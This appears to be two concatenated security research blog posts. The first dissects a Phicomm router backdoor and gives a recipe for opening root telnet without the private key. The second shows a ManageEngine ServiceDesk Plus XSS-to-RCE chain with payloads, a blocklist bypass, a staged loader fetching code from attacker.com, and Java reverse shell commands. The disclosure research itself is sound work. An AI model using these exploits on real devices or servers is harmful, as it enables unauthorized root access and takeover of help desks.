A screenshot of Jack Cruise’s post (passed through Google Translate), showing how the RoutAckProV1B2.exe tool can be used to crack the backdoor implemented in an obsolescent version of the K3C firmware. This tool, unlike ours, cannot crack the backdoor protocol used on the most recent versions of Phicomm firmware for the K2G and K3C routers.

A quick look at RoutAckProV1B2.exe suggested that it did, indeed, interact with whatever runs on UDP port 21210 (0x52da in hexadecimal, da 52 in little-endian representation).

A hex dump of RoutAckProV1B2.exe, which hints that this tool, too, interacts with a service that listens on UDP port 21210 on the router.

I wondered if I’d been scooped, for a moment, and spun up a Windows VM on the isolated network to which Phicomm K2G was connected. I downloaded the RoutAckProV1B2 tool, and monitored it with procmon.exe and Wireshark as it tried in vain to open the backdoor on the K2G. This tool wasn’t sending the handshake token, "ABCDEF1234".

A screenshot of the RoutAckProV1B2.exe tool running in a Windows VM, while being inspected by the Windows process monitor.

Instead it was sending a single 128-byte payload, five times in succession, before finally giving up.

This is the “magic packet” that the RoutAckProV1B2.exe tool uses to unlock the backdoor installed an older versions of Phicomm router firmware.
A closeup of the RoutAckProV1B2.exe tool, courtesy of Jack Cruise. The website www.right.com.cn is a Chinese-language forum for sharing technical information on a variety of routers.
Here we see the RoutAckProV1B2.exe tool unsuccessfully attempting to open the backdoor on a virtual machine running the most recent firmware I could find for the Phicomm K3C.

Versions 32.1.45 of the firmware and up, however, shared an identical build of the telnetd_startup daemon, which appeared to differ from its counterpart on the K2G router only in having been compiled to a big-endian MIPS instruction set, rather than the little-endian architecture found in the K2G. Surprisingly, this binary hadn’t been stripped of symbols, which made life just a little bit easier.

The function that set the ephemeral passwords (see above) suffered from the same programming mistake as its K2G counterpart, and was almost certainly built from the same source code.

A decompilation of the function I referred to above as “set_telnet_enable_keys()”, here seen in K3C’s build of the telnetd_startup binary. Here it’s compiled to a big-endian rather than little-endian MIPS architecture, and, unlike the K2G binary, has not been stripped of debugging symbols, which makes reverse engineering the binary somewhat easier. The algorithm is, nevertheless, identical.

All I’d need to do, then, was recover the hardcoded public RSA key from the binary and I could easily adapt my tool to pick the lock on this backdoor as well. Running strings -n 256 on the binary was all that it took.

Using strings -n 256 to grab the hardcoded public RSA key from the telnetd_startup binary in the K3C firmware (version 32.1.46.268).

strings also helped extract the product identifier. Where the Phicomm K2G build contained K2_COSTDOWN__VER_3.0, the K3C build had K3C_INTELALL_VER_3.0:

I used strings to grab the hardcoded product identifier from that binary, too.

I added this information to the table in the backdoor-lockpick tool, which associated product identifying strings with public RSA keys.

Adding the product identifier and hardcoded public RSA key to a lookup table used by my “backdoor lockpick” tool, enabling it to pick the lock on the K3C backdoor as well as the K2G one.

With a week to wait before my K3C arrived, I decided I’d make do with the tools at my disposal and emulate the K3C build of telnetd_startup in user mode with QEMU (wrapped, for the sake of portability and convenience, in a Docker container, following this method @drablyechos describes in this 2020 IOT Village talk at DEFCON, though the Docker wrapper isn’t strictly necessary).

The telnetd_startup daemon fails its preliminary search for the telnet flag in flash storage, since there’s no flash storage device to check, but it recovers from this failure gracefully and goes on to listen on UDP port 21210, just as it would if the telnet flag had been set to the disabled position in the flash device (which is, after all, the default setting).

The lockpick has no more trouble with this backdoor than it did with the one on the K2G.

A screencast showing my backdoor lockpick in action, again, this time picking the lock on the K3C’s backdoor. The K3C firmware, in this case, is being run on a virtual machine. The hardware was still in the mail.

For the sake of thoroughness, I decided to test RoutAckProV1B2.exe’s attack against my virtualized K3C, running firmware version 32.1.46.268.

Relying on Google Translate to read on-screen Chinese sometimes presents a challenge.

Google translate doing its best to help me read the log messages on RoutAckProV1B2.exe’s GUI.

Not entirely sure of what was happening here, I decided I’d better check Wireshark again. RoutAckProV1B2 was repeatedly sending 128-byte packets to my virtualized K3C server (running firmware version 32.1.46.268) on UDP port 21210, but receiving no replies. At no point did a telnet port open.

When tested against the older firmware version 32.1.26.175, however, RoutAckProV1B2.exe worked like a charm.

This seems to establish beyond any doubt that the most recent firmware versions for Phicomm’s K2G and K3C routers are using a new backdoor protocol, designed with better security but implemented with a catastrophic loophole, which permits anyone on the LAN to gain a root shell on either device.

The Phicomm K3C with International Firmware Version 33.1.25.177

Still unsure whether I’d tested the most recent versions of the Phicomm K3C firmware, or whether I’d find the same backdoor in the devices they’d built for the international market, I was eager to get my hands on a brand new K3C device. It arrived just as I was wrapping up with my K3C emulations.

I set up the router and found that the firmware running on this device bore the version 33.1.25.177, a major version bump ahead of the latest Chinese market firmware I’d tested.

The web admin interface for the international release of the K3C, running firmware version 33.1.25.177.

There was something listening on UDP port 21210, but it didn’t, at first, appear to behave like the backdoor I’d found on the Chinese market firmware I’d studied. Rather than listening silently until it received the magic handshake, ABCDEF1234, it would respond to any packet with an unpredictable, high-entropy packet containing exactly 128 bytes. I suspected this might be something like the encrypted secret that the backdoor would send to its client in Stage 2 of the protocol discussed above.

The behaviour was reminiscent of the simpler backdoor that the tool RoutAckProV1B2.exe seemed designed for, but I wasn’t able to get anywhere with that particular tool.

I figured I could make better sense of things if I could just look at the binary of whatever it was that listened on UDP port 21210 on this device, so I set to work taking it apart, in search of a UART port by which I might obtain a root shell.

I was in luck! The device not only sports a UART, but a clearly-labelled UART at that!

A clearly labelled UART at that!

So I grabbed my handy-dandy UART-to-USB serial bridge…

My handy-dandy UART-to-USB bridge.

…and set about soldering some header pins to the UART port. These devices are somewhat delicate machines, so I first tried to get as far as I could without disassembling everything and removing it from the casing. A hot air gun was helpful here.

And there we go:

UART pins ready!

The molten plastic casing was still a bit awkward to work around, however, so I did eventually end up taking things apart, and removing the unneeded upper board, which housed the RF components. Everything still worked fine.

With the UART adapter connected, I was able to obtain a serial connection using minicom, at 115200 Baud 8N1. This gave me access to a U-Boot BIOS shell after interrupting the boot process, with direct read and write access to the 1Gb F-die NAND flash storage chip (a Samsung 734 K9F1G08U0F SCB0), on which both the firmware and the bootloader are stored.

The Samsung 734 K9F1G08U0F SCB0.

If we let the boot process run its course, we’re presented with a linux login prompt. We could try to guess the password here, or take the more difficult, principled approach of first dumping the NAND and searching it for clues. Let’s do things the hard way. I adapted Valerio’s TCL expect script to hexdump the entire NAND volume, and left it running overnight.

Valerio’s U-Boot flash dumping script, adapted to work on the K3C.

I deserialized the hex back to binary with a bit of Python, and then went at it with the usual tools. The most rewarding turned out to be strings :

Digging some password hashes out of the NAND volume.

Hashcat didn’t have any trouble with this, and gave me one of the root passwords in seconds:

Returning to the login prompt while hashcat warmed up my office, I logged in with username root, password admin, and presto!

The firmware conveniently had netcat installed, and our old friend telnetd_startup was sitting right there in /usr/bin. I piped it over to my workstation, and dropped it into Ghidra.

The protocol implemented by the version of telnetd_startup in the latest international market firmware for the K3C closely resembles what we see in the Chinese market K2G 22.6.3.20 and the K3C 32.1.46.268. It differs only in omitting the initial stage. Rather than waiting for the ABCDEF1234 handshake, and then responding with a device identifying hash, it expects the initial packet to contain a message encrypted with the private RSA key that matches its hardcoded public key. It “decrypts” this message with the public key, XORs it with a randomly generated 31-character secret, and then, fatally, concatenates it with either +TEMP or +PERM using sprintf(), before hashing the result with MD5, to produce the ephemeral passwords for temporarily and permanently activating the telnet service respectively.

This all looks very familiar.
A familiar-looking xor() function in the international firmware for the K3C.
And here’s where they make their fatal mistake.

This algorithm is vulnerable to the same attack that worked against the three-stage backdoor protocol implemented in the telnetd_startup versions we’ve already looked at. All we need to do is grab the hardcoded public key and tweak our lockpick tool so that it skips the handshake/identifier stage when communicating with this particular release.

That public key, by the way, is

CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519

Remember that one.

I made the necessary adjustments to the tool, and it worked, again, like a charm!

An Exposed Private RSA Key in the K2 Router, with Firmware Version 22.5.9.163, but One that You Don’t Even Need

I mentioned, before, that another solution to this puzzle would simply be to obtain the private RSA key that matched the hardcoded public key. In the case of the K2G (the one in Wavlink’s clothing) I made some effort to search for the public key online, after converting it to various ASCII formats, just in case the pair had been left lying around somewhere. It was a long shot and didn’t pan out. But while I was exploring one of the older firmware images for Phicomm’s K2 line of routers— 22.5.9.163, dating from 2017— I noticed something interesting:

Look familiar?

It’s using the same public key we saw in the brand new international release of the Phicomm K3C. But there’s more:

That shouldn’t be there!

In firmware version 22.5.9.163 for the K2 router, Phicomm exposed the private RSA key corresponding to the hardcoded public key that they continued to deploy in their international release long after correcting the error in their domestic market firmware versions. This error didn’t go unnoticed — this key pair shows up in a strings dump of RoutAckProV1B2.exe, which attacks an earlier, simpler backdoor protocol than either of the two protocols analysed here.

The method for constructing the ephemeral passwords in the K2 22.5.9.163 differs from what we’ve seen in these later firmware versions. Instead of generating a random secret and XORing it with public-key-decrypted data received from the client prior to concatenating it with the two magic salts, this earlier release simply concatenates the client’s decrypted secret with the salts. Everything is then hashed with MD5, just as it was before, and the two passwords are set.

The md5_command() function from the telnetd_startup binary in the K2G 22.5.9.163 firmware.

Curiously, this release contains what must be a typo: instead of +PERM we have +PERP.

Now, leaked d parameter notwithstanding, it’s possible to crack open this backdoor without even using the private key. All that needs to be done is:

  1. Generate some ${phony_ciphertext} that the known public key will “decrypt” into a non-null buffer (call this the ${phony_plaintext}). It simplifies things if you also constrain things so that the phony plaintext contains no null bytes. This can be found pretty quickly through brute trial and error.
  2. Take the MD5 hash of the string ${phony_plaintext}+TEMP. Let’s call that the ${temp_password}.
  3. Send ${phony_ciphertext} to UDP port 21210 on the router.
  4. And then, quickly afterwards, send ${temp_password} to the same port.

This will open the telnet service on the K2 22.5.9.163. For a telnet service that persists after rebooting, do the same as above but substitute PERP for TEMP (this misspelling seems to be peculiar to this particular version).

A Reconstructed History of Phicomm’s Backdoor Protocols

In the course of researching this vulnerability, I’ve looked closely at eleven different firmware images. Arranged in order of build date, they are:

So, to sum things up, the history of the Phicomm backdoor looks like this:

The oldest generation I’ve found of Phicomm’s telnetd_startup protocol (shaded blue, in the tables above) is relatively simple: the server waits to receive an encrypted message, which it decrypts and hashes with two different salts. It then waits for another message, and if that message matches either of those hashes, it will either spawn the telnet service or write a flag to the flash drive to trigger the spawning of telnet on boot. This is the protocol we see in the K2 22.5.9.163, released in early 2017. That particular build made the blunder of hardcoding the private key in the binary, which defeats the purpose of asymmetric encryption. This error enabled the creation of RoutAckProV1B2.exe, a router-hacking tool which has been circulating online for several years, which uses the pilfered private key to allow any interested party to gain root access to this iteration of the backdoor. Of course, as we just saw, use of the private key isn’t even necessary to open the door. What the design overlooks — and this oversight will never be truly corrected — is that it’s not only possible but easy to generate phony ciphertext that a public RSA key will “decrypt” into predictable, phony plaintext. Doing so will permit an attacker to subvert the locking mechanism on the backdoor, and gain unauthorized entry.

Phicomm responded to this situation in an entirely insufficient fashion in the next generation of the protocol (shaded yellow, above), which we find in the firmware versions released later in 2017, including the still-for-sale international release of the K3C (analysed above). They redacted the private key from the binary, but failed to change the public key. Their next design, moreover, appears to share the assumption that it’s only by encrypting data with the private key that an attacker can predict or control the output of its public key decryption. Rather than addressing either of these errors, they just piled on further complexity: this is when they began to generate a 31-character random secret and XOR it with the public-key-decrypted data received from the client in order to generate their ephemeral passwords. This makes the backdoor slightly harder to attack, if we continue to ignore the leaked private key, but it’s ultimately just a matter of discovering some phony ciphertext that decrypts to a plaintext that begins with a printable ASCII character. This gives us a 1 in 92 chance of colliding with the first byte of the random secret, which, due to the careless use of sprintf‘s %s specifier for bytearray concatenation, will result in a completely predictable empheral password.

The next generation (mauve in the tables above) is the last I looked at, and likely the last released. Phicomm finally removed the compromised public key, and took the additional precaution of deploying a distinct public key to each router model. They also added a device-identifying handshake phase to the protocol, which makes the backdoor considerably stealthier — there’s no real way to tell that it’s listening on UDP port 21210, unless you send it the magic token ABCDEF1234. It responds to this magic token with a device-identifying hash, permitting the client to select the private key that matches the public key compiled into the service. The algorithm itself, however, shares the same security flaws as its predecessor, and is vulnerable to an essentially identical attack. This is the iteration we see in the Chinese market release of K3C 32.1.46.268, and the Chinese market K2G A1 22.6.3.20 — the firmware image that ended up on certain Wavlink-branded routers, that Wavlink neglected to flash with firmware of their own.

I’d love to conduct a more exhaustive test of various Phicomm firmware images, but they’re becomming rather difficult to find online. If you know where I might find a copy of a firmware version not mentioned here, please reach out to us at bughunters at tenable dot com.

Will these Vulnerabilities Ever Be Patched?

No.

These vulnerabilities will never be patched. Certainly not through official channels.

The Phicomm corporation is dead and gone.

After various attempts to contact Phicomm’s customer support offices in China, Germany, and California, and even reaching out to the CEO directly, I received this reply on October 10 from whatever remained of Phicomm’s American office.

Dear Sir,
Thank you for contacting Phicomm Support in Germany. Phicomm has closed all Business worldwide since 01.01.2019.
Yours sincerely
Service Team Phicomm

I’m not sure whether or not the @PHICOMM account on telegram.com is managed by the company, but if it is, things didn’t look good on that end, either.

Poor guy.

So, what exactly happened to Phicomm?

In 2015, while at the height of their economic power — with a net operating income of close to 10 billion yuan (a little over 1.5 billion USD), earning them comparisons to Huawei in the press — Phicomm, under the leadership of CEO and founder Gu Guoping, entered into a highly questionable business arrangement with the p2p lending company, Lianbi Financial. Former Project Director for Phicomm, James Soh, has posted on LinkedIn about

the sudden appearance in June 2015 of a person-to-person (P2P) financial service company called LianBi Finance that started month-long on-site promotion on company grounds. They claimed that LianBi Finance is a partner firm and there is proper agreement in place for collaboration between Shanghai Phicomm and LianBi Finance but it was never publicized. They promote financial products that has unrealistic returns. Thereafter, the tie-up between Shanghai Phicomm and LianBi Finance went further where Shanghai Phicomm home Wifi kit costing 399 RMB and up, shall be refunded by LianBi Finance for the full amount if the buyer scanned the QR code on the Wifi product box and provided personal details. People will buy more and more sets, however discovered that they cannot get the full amount back from the second set of kit they bought, instead they are offered to purchase a certain amount of financial investment products of say 5,000 RMB, and returns of 12% per month will be credited back into the buyer. This is a pyramid scheme in disguise. In addition, Mr Gu tied staff promotion and bonus in Shanghai Phicomm to how much LianBi products each person buy.
Gu Guoping, in better days than these.

Peer to Peer (P2P) lending is a high-risk financial instrument that often offers investors — that is, lenders —astonishingly high rates of return, and which has been criticized for being a Ponzi scheme with extra steps. It would eventually become known that Gu “effectively also owned and controlled LianBi.” 2016 saw the beginnings of the Chinese government’s crackdown on P2P lending platforms, in a campaign that would reach its summit in 2018. LianBi Financial was filed that year, under suspicion of “illegally absorbing public deposits.” In 2021, the police raided LianBi’s offices and arrested Gu Guoping.

Police raiding the LianBi Financial headquarters.

A public hearing was held against Gu on February 4, that year, and on December 8, 2021,

Gu Guoping was sentenced to life imprisonment for the crime of fundraising fraud, deprived of political rights for life, and confiscated all personal property. Nong Jin, Chen Yu, Zhu Jun, Wang Jingjing, and Zhang Jimin were sentenced to fixed-term imprisonment ranging from 15 to 10 years for the crime of fund-raising fraud, as well as confiscation of personal property of RMB 5 million to 600,000.
Gu Guoping, together with a few of his associates, at a public hearing in the Shanghai №1 Intermediate People’s Court, on February 4, 2021. The yellow sign says “defendant”.

And this, in a nutshell, is why we can expect no patches from Phicomm for the vulnerabilities discussed in this post.

So, what about Wavlink?

This part of the story is still a little unclear, but it seems to me that what happened was this: sometime between May, 2018, when they released their last batch of routers, and January 2019, when they closed down business worldwide, Phicomm liquidated their remaining stock of routers, selling the surplus K2Gs to the Winstars corporation. Winstars then outfitted these devices with the branding of their subsidiary, Wavlink, and distributed them through Amazon, which is how a Phicomm router in Wavlink clothing eventually arrived on my desk.

After hitting a wall with Phicomm, I reached out to Wavlink to report these vulnerabilities I’d found on what was, in a sense, their hardware. I imagined that they’d be interested to hear that they had been shipping out devices with Phicomm’s firmware. They replied that they had “released related patches last year or the beginning of this year,” but gave no indication as to how the customer might be able to upgrade to those patches if they were among those whose Wavlink-branded routers were running Phicomm firmware.

If removing the backdoor is your chief concern, then it’s far from given that re-flashing your router with Wavlink firmware would put you on any firmer ground. Wavlink, in fact, has its own history of installing backdoors. And shoddy or not, at least Phicomm made an effort to lock their backdoors. If you’re interested in reading more about Wavlink’s own backdoors, I recommend you read James Clee’s excellent writeup.

What Should I Do With my Phicomm Router?

There no longer exists an official avenue to update the firmware on any Phicomm router. The company collapsed entirely well before we discovered these zero days.

An intrepid user can, however, at their own risk, leverage one or more of the vulnerabilities documented above to re-flash their router with an open-source firmware like OpenWRT, which now supports several Phicomm models. There’s considerable risk of bricking your device in the process, and it isn’t for the faint of heart, but it’s quite probably the surest way to rid your router of the vulnerabilities analysed here.

Other creative solutions, available to the adventurous, might include using the backdoor to modify the firmware by hand —by disabling the telnetd_startup daemon, say. The user might also attempt to simply restrict access to UDP port 21210 by means of a firewall rule.

Remote management should be disabled immediately, if nothing else.

Disclosure Timeline

  • Tuesday, October 5, 2021: Phicomm customer support contacted to report vulnerabilities
  • Sunday, October 10, 2021: Phicomm’s German office replies to inform us that Phicomm “has closed all business worldwide since 01.01.2019.”
  • Thursday, October 7, 2021: Wavlink notified that several of their “AC1200” routers have shipped with vulnerable Phicomm firmware
  • Friday, October 8, 2021: Wavlink responds to request further details
  • Friday, October 29, 2021: Wavlink provided with requested details
  • Monday, December 6, 2021: Reminder sent to Wavlink after receiving no response

A Backdoor Lockpick was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus

17 August 2021 at 13:02

The unauthorized access of FireEye red team tools was an eye-opening event for the security community. In my personal opinion, it was especially enlightening to see the “prioritized list of CVEs that should be addressed to limit the effectiveness of the Red Team tools.” This list can be found on FireEye’s GitHub. The list reads to me as though these vulnerabilities are probably being exploited during FireEye red team engagements. More than likely, the listed products are commonly found in target environments. As a 0-day bug hunter, this screams out, “hunt me!” So we did.

Last, but not least, on the list is “CVE-2019–8394 — arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus.” A Shodan search for “ManageEngine ServiceDesk Plus” in the page title reveals over 5,000 public-facing instances. We chose to target this product, and we found some high impact vulnerabilities. On one hand, we’ve found a way to fully compromise the server, and on the other, we can exploit the agent software. This is a pentester’s pivoting playground.

Our story will be split into two blogs. Pivot over to David Wells’ related blog to check out a mind-bending heap overflow in the AssetExplorer Agent. For bugs on the server-side stay tuned.

TLDR

ManageEngine ServiceDesk Plus, prior to version 11200, is susceptible to a vulnerability chain leading to unauthenticated remote code execution. An unauthenticated, remote attacker is able to upload a malicious asset to the help desk. Once an unknowing help desk administrator views this new asset, the attacker can take control of the help desk application and fully compromise the underlying operating system.

The two flaws in the exploit chain include an unauthenticated stored cross-site scripting vulnerability (CVE-2021–20080) and a case of weak input validation (CVE-2021–20081) leading to arbitrary code execution. Initial access is first gained via cross-site scripting, and once triggered, the attacker can schedule the execution of malicious code with SYSTEM privileges. Below I have detailed these vulnerabilities.

Gaining a Foothold via XML Asset Ingestion

A key component of an IT service desk is the ability to manage assets. For example, company laptops, desktops, etc would likely be provisioned by IT and managed in a service desk software.

In ManageEngine ServiceDesk Plus (SDP), there is an API endpoint that allows an unauthenticated HTTP client to upload XML files containing asset definitions. The asset definition file allows all sorts of details to be defined, such as make, model, operating system, memory, network configuration, software installed, etc.

When a valid asset is POSTed to /discoveryServlet/WsDiscoveryServlet, an XML file is created on the server’s file system containing the asset. This file will be stored at C:\Program Files\ManageEngine\ServiceDesk\scannedxmls.

After a minute or so, it will be automatically picked up by SDP for processing. The asset will then be stored in the database, and it will be viewable as an asset in the administrative web user interface.

Below is an example of a Mac asset being uploaded. For the sake of brevity, I’ve left out most of the XML file. The key component is bolded on the line starting with “inet” in the “/sbin/ifconfig” output. The full proof of concept (PoC) can be found on our TRA-2021–11 research advisory.

Notice that the IP address contains JavaScript code to fire an alert. This is where the vulnerability rears its ugly head. The injected JavaScript will not be sanitized prior to being loaded in a web browser. Hence, the attacker can execute arbitrary JavaScript and abuse this flaw to perform administrative actions in the help desk application.

<?xml version="1.0" encoding="UTF-8" ?><DocRoot>
… snip ...
<NIC_Info><command>/sbin/ifconfig</command><output><![CDATA[
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=400<CHANNEL_IO>
ether 8c:85:90:d4:a6:e9
inet6 fe80::103b:588a:7772:e9db%en0 prefixlen 64 secured scopeid 0x5
inet ');}{alert("xss");// netmask 0xffffff00 broadcast 192.168.0.255
nd6 options=201<PERFORMNUD,DAD>
media: autoselect
status: active
]]></output></NIC_Info>
… snip ...
</DocRoot>

Let’s assume this XML is processed by SDP. When the administrator views this specific asset in SDP, a JavaScript alert would fire.

It’s pretty clear here that a stored cross-site scripting vulnerability exists, and we’ve assigned it as CVE-2021–20080. The root cause of this vulnerability is that the IP address is used to construct a JavaScript function without sanitization. This allows us to inject malicious JavaScript. In this case, the function would be constructed as such:

function clickToExpandIP(){
jQuery('#ips').text('[ ');}{alert("xss");// ]');
}

Notice how I closed the text() function call and the clickToExpandIP() function definition.

.text('[ ');}

After this, since there is a hanging closing curly brace on the next line, I start a new block, call alert, and comment out the rest of the line.

{alert("xss");//

Alert! We won’t stop here. Let’s ride the victim administrator’s session.

Reusing the HttpOnly Cookies

When a user logs in, the following session cookies are set in the response:

Set-Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; Path=/; HttpOnly
Set-Cookie: JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; Path=/; HttpOnly

The cookies have the HttpOnly flag set, which prevents JavaScript from accessing these cookie values directly. However, that doesn’t mean we can’t reuse the cookies in an XMLHttpRequest. The cookies will be included in the request, just as if it were a form submission.

The problem here is that a CSRF token is also in play. For example, if a user were to be deleted, the following request would fire.

DELETE /api/v3/users?ids=9 HTTP/1.1
Host: 172.26.31.177:8080
Content-Length: 160
Cache-Control: max-age=0
Accept: application/json, text/javascript, */*; q=0.01
X-ZCSRF-TOKEN: sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638
X-Requested-With: XMLHttpRequest
If-Modified-Since: Thu, 1 Jan 1970 00:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.26.31.177:8080
Referer: http://172.26.31.177:8080/SetUpWizard.do?forwardTo=requester&viewType=list
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; PORTALID=1; sdpcsrfcookie=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; _zcsr_tmp=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; memarketing-_zldp=Mltw9Iqq5RScV1w4XmHqtfyjDzbcGg%2Fgj2ZFSsChk9I%2BFeA4HQEbmBi6kWOCHoEBmdhXfrM16rA%3D; memarketing-_zldt=35fbbf7a-4275-4df4-918f-78167bc204c4-0
Connection: close
sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638&SUBREQUEST=XMLHTTP

Notice the use of the ‘X-ZCSRF-TOKEN’ header and the ‘sdpcsrfparam’ request parameter. The token value is also passed in the ‘sdpcsrfcookie’ and ‘_zcsr_tmp’ cookies. This means subsequent requests won’t succeed unless we set the proper CSRF headers and cookies.

However, when the CSRF cookies are set, they do not set the HttpOnly flag. Because of this, our malicious JavaScript can harvest the value of the CSRF token in order to provide the required headers and request data.

Putting it all together, we are able to send an XMLHttpRequest:

  • with the proper session cookie values
  • and with the required CSRF token values.

No Spaces Allowed

Another fun roadblock was the fact that spaces couldn’t be included in the IP address. If we were to specify the line with “AN IP” as the IP address:

inet AN IP netmask 0xffffff00 broadcast 192.168.0.255

The JavaScript function would be generated as such:

function clickToExpandIP(){
jQuery('#ips').text('[ AN ]');
}

Notice that ‘IP’ was truncated. This is due to the way that ServiceDesk Plus parses the IP address field. It expects an IP address followed by a space, so the “IP” text would be truncated in this case.

However, this can be bypassed using multiline comments to replace spaces.

');}{var/**/text="stillxss";alert(text);//

Putting these pieces together, this means when we exploit the XSS, and the administrator views our malicious asset, we can fire valid (and complex) application requests with administrative privileges. In particular, I ended up abusing the custom scheduled task feature.

Code Execution via a Malicious Custom Schedule

Being an IT service desk software, ManageEngine ServiceDesk Plus has loads of functionality. Similar to other IT software out there, it allows you to create custom scheduled tasks. Also similar to other IT software, it lets you run system commands. With powerful functionality, there is a fine line separating a vulnerability and a feature that simply works as designed. In this case, there is a clear vulnerability (CVE-2021–20081).

Custom Schedule Screen

Above I have pasted a screen shot of the form that allows an administrator to create a custom schedule. Notice the executor example in the Action section. This allows the administrator to run a command on a scheduled basis.

Dangerous, yes. A vuln? Not yet. It’s by design.

What happens if the administrator wants to write some text to the file system using this feature?

Administrator attempts to write to C:\test.txt

Interestingly, “echo” is a restricted word. Clearly a filter is in place to deny this word, probably for cases like this. After some code review, I found an XML file defining a list of restricted words.

C:\Program Files\ManageEngine\ServiceDesk\conf\Asset\servicedesk.xml:

<GlobalConfig globalconfigid="GlobalConfig:globalconfigid:2600" category="Execute_Script" parameter="Restricted_Words" paramvalue="outfile,Out-File,write,echo,OpenTextFile,move,Move-Item,move,mv,MoveFile,del,Remove-Item,remove,rm,unlink,rmdir,DeleteFile,ren,Rename-Item,rename,mv,cp,rm,MoveFile" description="Script Restricted Words"/>

Notice the word “echo” and a bunch of other words that all seem to relate to file system operations. Clearly the developer did not want to allow a custom scheduled task to explicitly modify files.

If we look at com.adventnet.servicedesk.utils.ServiceDeskUtil.java, we can see how the filter is applied.

public String[] getScriptRestrictedWords() throws Exception {
String restrictedWords = GlobalConfigUtil.getInstance().getGlobalConfigValue("Restricted_Words", "Execute_Script");
return restrictedWords.split(",");
}
public Set containsScriptRestrictedWords(String input) throws Exception {
HashSet<String> input_words = new HashSet<String>();
input_words.addAll(Arrays.asList(input.split(" ")));
input_words.retainAll(Arrays.asList(this.getScriptRestrictedWords()));
return input_words;
}

Most notably, the command line input string is split into words using a space character as a delimiter.

input_words.addAll(Arrays.asList(input.split(" ")));

This method of blocking commands containing restricted words is simply inadequate, and this is where the vulnerability comes into play. Let me show you how this filter can be bypassed.

One bypass for this involves the use of commas (or semicolons) to delimit the arguments of a command. For example, all of these commands are equivalent.

c:\>echo "Hello World"
"Hello World"
c:\>echo,"Hello World"
"Hello World"
c:\>echo;"Hello World"
"Hello World"

With this in mind, an administrator could craft a command with commas to write to disk. For example:

cmd /c "echo,testing > C:\\test.txt"

Even better, the command will execute with NT AUTHORITY\SYSTEM privileges. Sysinternals Process Monitor will prove that:

Pop a Shell

I opted for a Java-based reverse shell since I knew a Java executable would be shipped with ServiceDesk Plus. It is written in Java, after all. The command line contains the following logic.

I first used ‘echo’ to write out a Base64-encoded Java class.

echo,<Base64 encoded Java reverse shell class>> b64file

After that I used ‘certutil’ to decode the data into a functioning Java class. Thanks to Casey Dunham for the awesome Java reverse shell.

certutil -f -decode b64file ReverseTcpShell.class

And finally, I used the provided Java executable to launch a reverse shell that connects back to the attacker’s listener at IP:port.

C:\\PROGRA~1\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe ReverseTcpShell <attacker ip> <attacker port>

Chaining these Together

From a high level, an exploit chain looks like the following:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  5. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

This is the basic overview of a full exploit chain. However, there was a wrench thrown in that I’d like to mention. Namely, there was a maximum length enforced. Due to the length of a reverse shell payload, this restriction required me to use a staged approach.

Let me show you.

Staging the Custom Schedule

In order to solve this problem, I set up an HTTP listener that, when contacted by my XSS payload, would send more JavaScript code back to the browser. The XSS would then call eval() on this code, thereby loading another stage of JavaScript code.

So basically, the initial XSS payload contains enough code to reach out to the attacker’s HTTP server, and downloads another stage of JavaScript to be executed using eval(). Something like this:

function loaded() {
eval(this.responseText);
}
var req = new XMLHttpRequest();
req.addEventListener("load", loaded);
req.open("GET","http://attacker.com/more_js");
req.send(null);

Once the JavaScript downloads, the loaded() function fires. The one catch is that since we’re in the browser, a CORS header needs to be set by the attacker’s listener:

Access-Control-Allow-Origin: *

This will tell the browser it’s okay to load the attacker server’s content in the ServiceDesk Plus application, since they’re cross-origin. Using this strategy, a massive chunk of JavaScript can be loaded. With all of this in mind, a full exploit can be constructed like so:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The XSS will download more JavaScript from the attacker’s HTTP server.
  5. The downloaded JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  6. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

Let’s see all of this in action:

https://www.youtube.com/watch?v=DhrJxVqmsIo

Wrapping Up

